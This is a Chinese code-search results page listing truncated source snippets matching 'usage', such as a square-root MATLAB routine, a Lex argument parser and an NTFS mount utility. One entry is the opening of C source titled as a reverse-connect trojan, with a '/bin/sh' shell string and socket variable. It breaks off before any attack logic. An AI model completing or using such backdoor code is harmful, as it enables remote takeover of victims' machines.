代码搜索:usage
找到约 10,000 项符合「usage」的源代码
代码结果 10,000
www.eeworm.com/read/137229/13339021
m r.m
%
% routine to get the square root of a number
%
% usage: via tree structured GA
%
function out = r(x)
%
%
out=sqrt(abs(x));
www.eeworm.com/read/137022/13347518
c bootpcmd.c
/*************************************************/
/* Center for Information Technology Integration */
/* The University of Michigan */
/*
www.eeworm.com/read/322223/13385028
log ncsim.log
ncsim: v03.40.(b001): (c) Copyright 1995 - 2001 Cadence Design Systems, Inc.
ncsim: *F,MISSIM: missing simulation name.
ncsim: Memory Usage - 4.5M program + 0.2M data = 4.7M total
ncsim: CPU Usage - 0
www.eeworm.com/read/320605/13421895
java randombounds.java
//: c03:RandomBounds.java
// Does Math.random() produce 0.0 and 1.0?
// {RunByHand}
// From 'Thinking in Java, 3rd ed.' (c) Bruce Eckel 2002
// www.BruceEckel.com. See copyright notice in CopyRigh
www.eeworm.com/read/315921/13534870
l ch2-04.l
%{
unsigned verbose;
char *progName;
%}
%%
-h |
"-?" |
-help { printf("usage is: %s [-help | -h | -? ] [-verbose | -v] "
"[(-file| -f) filename]\n", progName);
}
-v |
-verbose { printf("verbose m
www.eeworm.com/read/315460/13541985
h glibrary.h
/*
* File: glibrary.h
* Version: 3.0
* Last modified on Sat Oct 1 12:28:02 1994 by eroberts
* -----------------------------------------------------
* This interface exports several simple, low-l
www.eeworm.com/read/315110/13551865
texi main.texi
@node Top, About, (dir), (dir)
@menu
* About:: About LibGTop
* White Paper:: LibGTop White Paper
* Reference Manual:: LibGTop Reference Manual
--- T
www.eeworm.com/read/314773/13559409
txt 第一个反弹木马代码:作者 iceblood.txt
#include
#include
#include
#include
#include
#include
#include
void usage();
char shell[]="/bin/sh";
char message[]="s8s8 welcome\n";
int sock;
int main(int argc, char *argv[]) {
www.eeworm.com/read/314717/13560509
bat pdf2ps.bat
@echo off
@rem Convert PDF to PostScript.
if "%1"=="" goto usage
if "%2"=="" goto usage
echo -dNODISPLAY -dNOPAUSE >_.at
:cp
if "%3"=="" goto doit
echo %1 >>_.at
shift
goto cp
:doit
re
www.eeworm.com/read/313229/13591580
c mount_ntfs.c
#include
#include
#include
#include
#include
#include "mntopts.h"
struct mntopt mopts[] = {
MOPT_STDOPTS,
MOPT_UPDATE,
{NULL}
};
void usa